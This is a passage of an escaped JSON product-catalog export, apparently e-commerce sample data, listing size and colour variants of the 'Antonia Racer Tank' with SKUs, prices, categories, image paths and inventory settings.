",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1735\":{\"sku\":\"WT08-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-XS-Purple\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1736\":{\"sku\":\"WT08-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-XS-Yellow\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1737\":{\"sku\":\"WT08-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-S-Black\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1738\":{\"sku\":\"WT08-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-S-Purple\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1739\":{\"sku\":\"WT08-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-S-Yellow\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1740\":{\"sku\":\"WT08-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-M-Black\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1741\":{\"sku\":\"WT08-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-M-Purple\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1742\":{\"sku\":\"WT08-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-M-Yellow\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1743\":{\"sku\":\"WT08-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-L-Black\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_